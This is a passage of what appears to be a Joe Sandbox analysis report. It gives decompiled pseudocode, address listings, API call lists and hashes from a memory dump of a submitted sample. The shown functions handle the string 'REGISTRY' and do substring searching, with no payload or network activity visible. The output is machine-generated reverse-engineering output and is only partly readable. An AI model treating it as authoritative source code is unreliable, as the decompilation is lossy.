                                                                                                                                                                                                                                                                                          						_t65 =  &(_t65[4]);
                                                                                                                                                                                                                                                                                          						if(_t26 == 0) {
                                                                                                                                                                                                                                                                                          							goto L5;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							E0010ACA0(_t60);
                                                                                                                                                                                                                                                                                          							_t44 = _t65;
                                                                                                                                                                                                                                                                                          							L8:
                                                                                                                                                                                                                                                                                          							if(_t44 == 0) {
                                                                                                                                                                                                                                                                                          								goto L11;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								 *_t44 = 0;
                                                                                                                                                                                                                                                                                          								_t38 = WideCharToMultiByte(3, 0, L"REGISTRY", 0xffffffff, _t44, _t60, 0, 0);
                                                                                                                                                                                                                                                                                          								asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                          								_t27 =  ~_t38 & _t44;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				if(_t27 != 0) {
                                                                                                                                                                                                                                                                                          					_t53 = _a4;
                                                                                                                                                                                                                                                                                          					_t61 = E000F21A0(_t27, _a4, _a8, _a12 & 0x0000ffff, 1);
                                                                                                                                                                                                                                                                                          					while(_t56 != 0) {
                                                                                                                                                                                                                                                                                          						_t56 =  *_t56;
                                                                                                                                                                                                                                                                                          						E00105DE2(_t56);
                                                                                                                                                                                                                                                                                          						_t65 =  &(_t65[4]);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t29 = _t61;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					while(_t56 != 0) {
                                                                                                                                                                                                                                                                                          						_t56 =  *_t56;
                                                                                                                                                                                                                                                                                          						E00105DE2(_t56);
                                                                                                                                                                                                                                                                                          						_t65 =  &(_t65[4]);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t29 = 0x8007000e;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          				_pop(_t57);
                                                                                                                                                                                                                                                                                          				_pop(_t62);
                                                                                                                                                                                                                                                                                          				_pop(_t43);
                                                                                                                                                                                                                                                                                          				return E001059E6(_t29, _t43, _v20 ^ _t63, _t53, _t57, _t62);
                                                                                                                                                                                                                                                                                          			}

































                                                                                                                                                                                                                                                                                          0x000f24c0
                                                                                                                                                                                                                                                                                          0x000f24c0
                                                                                                                                                                                                                                                                                          0x000f24c3
                                                                                                                                                                                                                                                                                          0x000f24c5
                                                                                                                                                                                                                                                                                          0x000f24d0
                                                                                                                                                                                                                                                                                          0x000f24d1
                                                                                                                                                                                                                                                                                          0x000f24d4
                                                                                                                                                                                                                                                                                          0x000f24d9
                                                                                                                                                                                                                                                                                          0x000f24db
                                                                                                                                                                                                                                                                                          0x000f24e1
                                                                                                                                                                                                                                                                                          0x000f24e5
                                                                                                                                                                                                                                                                                          0x000f24eb
                                                                                                                                                                                                                                                                                          0x000f24ed
                                                                                                                                                                                                                                                                                          0x000f24f5
                                                                                                                                                                                                                                                                                          0x000f24f8
                                                                                                                                                                                                                                                                                          0x000f24ff
                                                                                                                                                                                                                                                                                          0x000f2500
                                                                                                                                                                                                                                                                                          0x000f2502
                                                                                                                                                                                                                                                                                          0x000f2506
                                                                                                                                                                                                                                                                                          0x000f250a
                                                                                                                                                                                                                                                                                          0x000f250f
                                                                                                                                                                                                                                                                                          0x000f2511
                                                                                                                                                                                                                                                                                          0x000f2514
                                                                                                                                                                                                                                                                                          0x000f258f
                                                                                                                                                                                                                                                                                          0x000f258f
                                                                                                                                                                                                                                                                                          0x000f251b
                                                                                                                                                                                                                                                                                          0x000f2521
                                                                                                                                                                                                                                                                                          0x000f253b
                                                                                                                                                                                                                                                                                          0x000f2543
                                                                                                                                                                                                                                                                                          0x000f2585
                                                                                                                                                                                                                                                                                          0x000f258a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2545
                                                                                                                                                                                                                                                                                          0x000f2545
                                                                                                                                                                                                                                                                                          0x000f2549
                                                                                                                                                                                                                                                                                          0x000f254e
                                                                                                                                                                                                                                                                                          0x000f2553
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2555
                                                                                                                                                                                                                                                                                          0x000f2555
                                                                                                                                                                                                                                                                                          0x000f2557
                                                                                                                                                                                                                                                                                          0x000f2559
                                                                                                                                                                                                                                                                                          0x000f255c
                                                                                                                                                                                                                                                                                          0x000f255c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f255c
                                                                                                                                                                                                                                                                                          0x000f2553
                                                                                                                                                                                                                                                                                          0x000f2523
                                                                                                                                                                                                                                                                                          0x000f2524
                                                                                                                                                                                                                                                                                          0x000f2529
                                                                                                                                                                                                                                                                                          0x000f252e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2530
                                                                                                                                                                                                                                                                                          0x000f2532
                                                                                                                                                                                                                                                                                          0x000f2537
                                                                                                                                                                                                                                                                                          0x000f255f
                                                                                                                                                                                                                                                                                          0x000f2561
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2563
                                                                                                                                                                                                                                                                                          0x000f2574
                                                                                                                                                                                                                                                                                          0x000f2577
                                                                                                                                                                                                                                                                                          0x000f257f
                                                                                                                                                                                                                                                                                          0x000f2581
                                                                                                                                                                                                                                                                                          0x000f2581
                                                                                                                                                                                                                                                                                          0x000f2561
                                                                                                                                                                                                                                                                                          0x000f252e
                                                                                                                                                                                                                                                                                          0x000f2521
                                                                                                                                                                                                                                                                                          0x000f2593
                                                                                                                                                                                                                                                                                          0x000f25c1
                                                                                                                                                                                                                                                                                          0x000f25cb
                                                                                                                                                                                                                                                                                          0x000f25cf
                                                                                                                                                                                                                                                                                          0x000f25d2
                                                                                                                                                                                                                                                                                          0x000f25d4
                                                                                                                                                                                                                                                                                          0x000f25d9
                                                                                                                                                                                                                                                                                          0x000f25dc
                                                                                                                                                                                                                                                                                          0x000f25e0
                                                                                                                                                                                                                                                                                          0x000f2595
                                                                                                                                                                                                                                                                                          0x000f2597
                                                                                                                                                                                                                                                                                          0x000f25a1
                                                                                                                                                                                                                                                                                          0x000f25a3
                                                                                                                                                                                                                                                                                          0x000f25a8
                                                                                                                                                                                                                                                                                          0x000f25ab
                                                                                                                                                                                                                                                                                          0x000f25af
                                                                                                                                                                                                                                                                                          0x000f25af
                                                                                                                                                                                                                                                                                          0x000f25e8
                                                                                                                                                                                                                                                                                          0x000f25f0
                                                                                                                                                                                                                                                                                          0x000f25f1
                                                                                                                                                                                                                                                                                          0x000f25f2
                                                                                                                                                                                                                                                                                          0x000f2600

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(REGISTRY,1F9A9BDF,00000000,?,00000000,?,00112CF0,Module,?), ref: 000F24F8
                                                                                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 000F2549
                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000003,00000000,REGISTRY,000000FF,00000008,00000001,00000000,00000000), ref: 000F2577
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide_malloclstrlen
                                                                                                                                                                                                                                                                                          • String ID: REGISTRY
                                                                                                                                                                                                                                                                                          • API String ID: 2576735857-194740550
                                                                                                                                                                                                                                                                                          • Opcode ID: 48703e188e915989f1f07c5ef9ae190745d7b7774339d0e2c1c5535e22034c11
                                                                                                                                                                                                                                                                                          • Instruction ID: cc019c59feddb02ea7bda06a65277d14ac5ac7b754f66a8c0d16adf858ac6d6b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48703e188e915989f1f07c5ef9ae190745d7b7774339d0e2c1c5535e22034c11
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4316E72A00A0D97D7119B68CC52BBFB3E5EB94B10F250225FA14D76D4EBB4DD009681
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                                                                                                                                                                          			E000F27A0(void* __ecx, signed int __edx, signed int _a4, struct HINSTANCE__* _a8, signed short _a12) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                                          				intOrPtr* _v24;
                                                                                                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                                                                                                          				void* _v48;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t20;
                                                                                                                                                                                                                                                                                          				signed int _t21;
                                                                                                                                                                                                                                                                                          				int _t23;
                                                                                                                                                                                                                                                                                          				signed int _t26;
                                                                                                                                                                                                                                                                                          				signed int _t27;
                                                                                                                                                                                                                                                                                          				intOrPtr _t29;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t37;
                                                                                                                                                                                                                                                                                          				signed int _t38;
                                                                                                                                                                                                                                                                                          				intOrPtr _t43;
                                                                                                                                                                                                                                                                                          				char* _t44;
                                                                                                                                                                                                                                                                                          				void* _t45;
                                                                                                                                                                                                                                                                                          				signed int _t52;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t56;
                                                                                                                                                                                                                                                                                          				intOrPtr _t57;
                                                                                                                                                                                                                                                                                          				signed int _t59;
                                                                                                                                                                                                                                                                                          				int _t60;
                                                                                                                                                                                                                                                                                          				intOrPtr _t61;
                                                                                                                                                                                                                                                                                          				intOrPtr _t62;
                                                                                                                                                                                                                                                                                          				signed int _t63;
                                                                                                                                                                                                                                                                                          				void* _t64;
                                                                                                                                                                                                                                                                                          				char* _t65;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t52 = __edx;
                                                                                                                                                                                                                                                                                          				_t45 = __ecx;
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0010FC48);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t65 = _t64 - 0x10;
                                                                                                                                                                                                                                                                                          				_t20 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_t21 = _t20 ^ _t63;
                                                                                                                                                                                                                                                                                          				_v20 = _t21;
                                                                                                                                                                                                                                                                                          				_push(_t21);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_t56 = 0;
                                                                                                                                                                                                                                                                                          				_v24 = 0;
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				_t23 = lstrlenW(L"REGISTRY");
                                                                                                                                                                                                                                                                                          				asm("cdq");
                                                                                                                                                                                                                                                                                          				_t59 = _t23 + 1;
                                                                                                                                                                                                                                                                                          				_t53 = (_t52 << 0x00000020 | _t59) << 1;
                                                                                                                                                                                                                                                                                          				_t60 = _t59 + _t59;
                                                                                                                                                                                                                                                                                          				_t26 = _t60 + 0x80000000;
                                                                                                                                                                                                                                                                                          				asm("adc edx, edi");
                                                                                                                                                                                                                                                                                          				_v28 = (_t52 << 0x00000020 | _t59) << 1;
                                                                                                                                                                                                                                                                                          				if(_t26 != 0 || _t26 > 0xffffffff) {
                                                                                                                                                                                                                                                                                          					L11:
                                                                                                                                                                                                                                                                                          					_t27 = 0;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					if(_t60 > 0x400) {
                                                                                                                                                                                                                                                                                          						L5:
                                                                                                                                                                                                                                                                                          						if((_t26 | 0xffffffff) - _t60 < 8) {
                                                                                                                                                                                                                                                                                          							_push(0x80070216);
                                                                                                                                                                                                                                                                                          							E000F1170(_t53);
                                                                                                                                                                                                                                                                                          							goto L11;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t10 = _t60 + 8; // 0x9
                                                                                                                                                                                                                                                                                          							_t37 = E00105E1C(_t53, _t56, _t60, _t10);
                                                                                                                                                                                                                                                                                          							_t65 =  &(_t65[4]);
                                                                                                                                                                                                                                                                                          							if(_t37 == _t56) {
                                                                                                                                                                                                                                                                                          								goto L11;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								 *_t37 = _t56;
                                                                                                                                                                                                                                                                                          								_t56 = _t37;
                                                                                                                                                                                                                                                                                          								_v24 = _t56;
                                                                                                                                                                                                                                                                                          								_t12 = _t37 + 8; // 0x8
                                                                                                                                                                                                                                                                                          								_t44 = _t12;
                                                                                                                                                                                                                                                                                          								goto L8;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t26 = E000F1030(_t45, _t53, _t60);
                                                                                                                                                                                                                                                                                          						_t65 =  &(_t65[4]);
                                                                                                                                                                                                                                                                                          						if(_t26 == 0) {
                                                                                                                                                                                                                                                                                          							goto L5;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							E0010ACA0(_t60);
                                                                                                                                                                                                                                                                                          							_t44 = _t65;
                                                                                                                                                                                                                                                                                          							L8:
                                                                                                                                                                                                                                                                                          							if(_t44 == 0) {
                                                                                                                                                                                                                                                                                          								goto L11;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								 *_t44 = 0;
                                                                                                                                                                                                                                                                                          								_t38 = WideCharToMultiByte(3, 0, L"REGISTRY", 0xffffffff, _t44, _t60, 0, 0);
                                                                                                                                                                                                                                                                                          								asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                          								_t27 =  ~_t38 & _t44;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				if(_t27 != 0) {
                                                                                                                                                                                                                                                                                          					_t53 = _a4;
                                                                                                                                                                                                                                                                                          					_t61 = E000F21A0(_t27, _a4, _a8, _a12 & 0x0000ffff, 0);
                                                                                                                                                                                                                                                                                          					while(_t56 != 0) {
                                                                                                                                                                                                                                                                                          						_t56 =  *_t56;
                                                                                                                                                                                                                                                                                          						E00105DE2(_t56);
                                                                                                                                                                                                                                                                                          						_t65 =  &(_t65[4]);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t29 = _t61;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					while(_t56 != 0) {
                                                                                                                                                                                                                                                                                          						_t56 =  *_t56;
                                                                                                                                                                                                                                                                                          						E00105DE2(_t56);
                                                                                                                                                                                                                                                                                          						_t65 =  &(_t65[4]);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t29 = 0x8007000e;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          				_pop(_t57);
                                                                                                                                                                                                                                                                                          				_pop(_t62);
                                                                                                                                                                                                                                                                                          				_pop(_t43);
                                                                                                                                                                                                                                                                                          				return E001059E6(_t29, _t43, _v20 ^ _t63, _t53, _t57, _t62);
                                                                                                                                                                                                                                                                                          			}

































                                                                                                                                                                                                                                                                                          0x000f27a0
                                                                                                                                                                                                                                                                                          0x000f27a0
                                                                                                                                                                                                                                                                                          0x000f27a3
                                                                                                                                                                                                                                                                                          0x000f27a5
                                                                                                                                                                                                                                                                                          0x000f27b0
                                                                                                                                                                                                                                                                                          0x000f27b1
                                                                                                                                                                                                                                                                                          0x000f27b4
                                                                                                                                                                                                                                                                                          0x000f27b9
                                                                                                                                                                                                                                                                                          0x000f27bb
                                                                                                                                                                                                                                                                                          0x000f27c1
                                                                                                                                                                                                                                                                                          0x000f27c5
                                                                                                                                                                                                                                                                                          0x000f27cb
                                                                                                                                                                                                                                                                                          0x000f27cd
                                                                                                                                                                                                                                                                                          0x000f27d5
                                                                                                                                                                                                                                                                                          0x000f27d8
                                                                                                                                                                                                                                                                                          0x000f27df
                                                                                                                                                                                                                                                                                          0x000f27e0
                                                                                                                                                                                                                                                                                          0x000f27e2
                                                                                                                                                                                                                                                                                          0x000f27e6
                                                                                                                                                                                                                                                                                          0x000f27ea
                                                                                                                                                                                                                                                                                          0x000f27ef
                                                                                                                                                                                                                                                                                          0x000f27f1
                                                                                                                                                                                                                                                                                          0x000f27f4
                                                                                                                                                                                                                                                                                          0x000f286f
                                                                                                                                                                                                                                                                                          0x000f286f
                                                                                                                                                                                                                                                                                          0x000f27fb
                                                                                                                                                                                                                                                                                          0x000f2801
                                                                                                                                                                                                                                                                                          0x000f281b
                                                                                                                                                                                                                                                                                          0x000f2823
                                                                                                                                                                                                                                                                                          0x000f2865
                                                                                                                                                                                                                                                                                          0x000f286a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2825
                                                                                                                                                                                                                                                                                          0x000f2825
                                                                                                                                                                                                                                                                                          0x000f2829
                                                                                                                                                                                                                                                                                          0x000f282e
                                                                                                                                                                                                                                                                                          0x000f2833
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2835
                                                                                                                                                                                                                                                                                          0x000f2835
                                                                                                                                                                                                                                                                                          0x000f2837
                                                                                                                                                                                                                                                                                          0x000f2839
                                                                                                                                                                                                                                                                                          0x000f283c
                                                                                                                                                                                                                                                                                          0x000f283c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f283c
                                                                                                                                                                                                                                                                                          0x000f2833
                                                                                                                                                                                                                                                                                          0x000f2803
                                                                                                                                                                                                                                                                                          0x000f2804
                                                                                                                                                                                                                                                                                          0x000f2809
                                                                                                                                                                                                                                                                                          0x000f280e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2810
                                                                                                                                                                                                                                                                                          0x000f2812
                                                                                                                                                                                                                                                                                          0x000f2817
                                                                                                                                                                                                                                                                                          0x000f283f
                                                                                                                                                                                                                                                                                          0x000f2841
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2843
                                                                                                                                                                                                                                                                                          0x000f2854
                                                                                                                                                                                                                                                                                          0x000f2857
                                                                                                                                                                                                                                                                                          0x000f285f
                                                                                                                                                                                                                                                                                          0x000f2861
                                                                                                                                                                                                                                                                                          0x000f2861
                                                                                                                                                                                                                                                                                          0x000f2841
                                                                                                                                                                                                                                                                                          0x000f280e
                                                                                                                                                                                                                                                                                          0x000f2801
                                                                                                                                                                                                                                                                                          0x000f2873
                                                                                                                                                                                                                                                                                          0x000f28a1
                                                                                                                                                                                                                                                                                          0x000f28ab
                                                                                                                                                                                                                                                                                          0x000f28af
                                                                                                                                                                                                                                                                                          0x000f28b2
                                                                                                                                                                                                                                                                                          0x000f28b4
                                                                                                                                                                                                                                                                                          0x000f28b9
                                                                                                                                                                                                                                                                                          0x000f28bc
                                                                                                                                                                                                                                                                                          0x000f28c0
                                                                                                                                                                                                                                                                                          0x000f2875
                                                                                                                                                                                                                                                                                          0x000f2877
                                                                                                                                                                                                                                                                                          0x000f2881
                                                                                                                                                                                                                                                                                          0x000f2883
                                                                                                                                                                                                                                                                                          0x000f2888
                                                                                                                                                                                                                                                                                          0x000f288b
                                                                                                                                                                                                                                                                                          0x000f288f
                                                                                                                                                                                                                                                                                          0x000f288f
                                                                                                                                                                                                                                                                                          0x000f28c8
                                                                                                                                                                                                                                                                                          0x000f28d0
                                                                                                                                                                                                                                                                                          0x000f28d1
                                                                                                                                                                                                                                                                                          0x000f28d2
                                                                                                                                                                                                                                                                                          0x000f28e0

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(REGISTRY,1F9A9BDF,00000000,?,00000000,?,00112CF0,Module,?), ref: 000F27D8
                                                                                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 000F2829
                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000003,00000000,REGISTRY,000000FF,00000008,00000001,00000000,00000000), ref: 000F2857
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide_malloclstrlen
                                                                                                                                                                                                                                                                                          • String ID: REGISTRY
                                                                                                                                                                                                                                                                                          • API String ID: 2576735857-194740550
                                                                                                                                                                                                                                                                                          • Opcode ID: 2bfd360750b1923b543b962106bcbdd3191af6ad5d87af68004e303c190a790f
                                                                                                                                                                                                                                                                                          • Instruction ID: f4de9afb41ff8eaaa3e19011ac9fa64d787c011c5295dfd9f7953fb480c3417c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2bfd360750b1923b543b962106bcbdd3191af6ad5d87af68004e303c190a790f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20315972E0160C9BD7219B28CC42BBFB7E5EBA07A0F204229FA15D76D4EF74DC019691
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 97%
                                                                                                                                                                                                                                                                                          			E00105F9B(void* __ebx, void* __edi, signed char _a4, signed char _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                                                                          				signed char _t43;
                                                                                                                                                                                                                                                                                          				void* _t44;
                                                                                                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                                                                                                          				signed char _t47;
                                                                                                                                                                                                                                                                                          				intOrPtr _t48;
                                                                                                                                                                                                                                                                                          				intOrPtr _t49;
                                                                                                                                                                                                                                                                                          				intOrPtr _t52;
                                                                                                                                                                                                                                                                                          				intOrPtr _t54;
                                                                                                                                                                                                                                                                                          				intOrPtr _t58;
                                                                                                                                                                                                                                                                                          				void* _t59;
                                                                                                                                                                                                                                                                                          				signed char _t64;
                                                                                                                                                                                                                                                                                          				signed char _t68;
                                                                                                                                                                                                                                                                                          				signed int _t69;
                                                                                                                                                                                                                                                                                          				intOrPtr _t75;
                                                                                                                                                                                                                                                                                          				signed char _t76;
                                                                                                                                                                                                                                                                                          				signed char _t78;
                                                                                                                                                                                                                                                                                          				signed char _t81;
                                                                                                                                                                                                                                                                                          				signed char _t83;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				E001059F5(__ebx,  &_v20, __edi, _a12);
                                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(_v16 + 8)) != 0) {
                                                                                                                                                                                                                                                                                          					_t43 = _a8;
                                                                                                                                                                                                                                                                                          					__eflags = _t43;
                                                                                                                                                                                                                                                                                          					if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          						__eflags =  *_t43;
                                                                                                                                                                                                                                                                                          						if( *_t43 != 0) {
                                                                                                                                                                                                                                                                                          							_t81 = _a4;
                                                                                                                                                                                                                                                                                          							__eflags = _t81;
                                                                                                                                                                                                                                                                                          							if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          								_push(__ebx);
                                                                                                                                                                                                                                                                                          								_push(__edi);
                                                                                                                                                                                                                                                                                          								_t78 = _t81;
                                                                                                                                                                                                                                                                                          								_t44 = E00108970(_t43);
                                                                                                                                                                                                                                                                                          								_t46 = E00108970(_t81) + _t81 - _t44;
                                                                                                                                                                                                                                                                                          								__eflags =  *_t81;
                                                                                                                                                                                                                                                                                          								if( *_t81 == 0) {
                                                                                                                                                                                                                                                                                          									L27:
                                                                                                                                                                                                                                                                                          									__eflags = _v8;
                                                                                                                                                                                                                                                                                          									if(_v8 != 0) {
                                                                                                                                                                                                                                                                                          										_t48 = _v12;
                                                                                                                                                                                                                                                                                          										_t35 = _t48 + 0x70;
                                                                                                                                                                                                                                                                                          										 *_t35 =  *(_t48 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                                                                                                          										__eflags =  *_t35;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_t47 = 0;
                                                                                                                                                                                                                                                                                          									__eflags = 0;
                                                                                                                                                                                                                                                                                          									L30:
                                                                                                                                                                                                                                                                                          									L31:
                                                                                                                                                                                                                                                                                          									return _t47;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t83 = _t81 - _a8;
                                                                                                                                                                                                                                                                                          								__eflags = _t83;
                                                                                                                                                                                                                                                                                          								while(1) {
                                                                                                                                                                                                                                                                                          									__eflags = _t78 - _t46;
                                                                                                                                                                                                                                                                                          									if(_t78 > _t46) {
                                                                                                                                                                                                                                                                                          										goto L27;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_t64 =  *_t78;
                                                                                                                                                                                                                                                                                          									_t68 = _a8;
                                                                                                                                                                                                                                                                                          									__eflags = _t64;
                                                                                                                                                                                                                                                                                          									if(_t64 == 0) {
                                                                                                                                                                                                                                                                                          										L22:
                                                                                                                                                                                                                                                                                          										__eflags =  *_t68;
                                                                                                                                                                                                                                                                                          										if( *_t68 == 0) {
                                                                                                                                                                                                                                                                                          											L33:
                                                                                                                                                                                                                                                                                          											__eflags = _v8;
                                                                                                                                                                                                                                                                                          											if(_v8 != 0) {
                                                                                                                                                                                                                                                                                          												_t49 = _v12;
                                                                                                                                                                                                                                                                                          												_t39 = _t49 + 0x70;
                                                                                                                                                                                                                                                                                          												 *_t39 =  *(_t49 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                                                                                                          												__eflags =  *_t39;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											_t47 = _t78;
                                                                                                                                                                                                                                                                                          											goto L30;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										_t75 = _v16;
                                                                                                                                                                                                                                                                                          										_t69 = _t64 & 0x000000ff;
                                                                                                                                                                                                                                                                                          										_t78 = _t78 + 1;
                                                                                                                                                                                                                                                                                          										_t83 = _t83 + 1;
                                                                                                                                                                                                                                                                                          										__eflags =  *(_t69 + _t75 + 0x1d) & 0x00000004;
                                                                                                                                                                                                                                                                                          										if(( *(_t69 + _t75 + 0x1d) & 0x00000004) == 0) {
